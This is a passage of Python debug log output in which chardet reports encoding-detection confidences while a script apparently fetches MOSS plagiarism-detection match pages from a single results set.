0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.524898679768566\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5576615334671211\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match49-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match49-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match49-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match53-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match53-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match53-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match55-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match55-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match55-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match52-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 15948\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 15935\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 15948\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19746\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 15935\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 15935\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 15936\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 15935\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19747\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19746\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5499332168881715\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5280973138154603\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match52-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match52-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match62-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match62-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match62-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match58-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match58-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match58-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match56-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match56-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match56-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match59-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16703\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19770\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16690\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19471\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16703\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19757\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19458\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16690\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19770\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19471\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16690\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19757\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19458\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16691\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19757\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19758\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16690\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19757\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19458\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 55926\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19459\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5325380458632789\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19458\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 55926\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 55926\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 55927\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 55926\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5424012172369261\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5564722523272813\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5277505283021648\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match59-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match59-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match63-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match63-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match63-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match60-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match60-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match60-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match57-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21316\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21303\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21316\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5414370913710895\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21303\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21303\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21304\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21303\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5422544521472298\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match57-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match57-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match61-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match61-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match61-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match64-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match64-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match64-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21629\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21630\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21629\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5322320954044778\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match65-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match65-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match65-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match70-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match70-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match70-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match67-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match67-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match67-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21464\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21451\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21464\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21451\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21451\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21452\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21451\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not 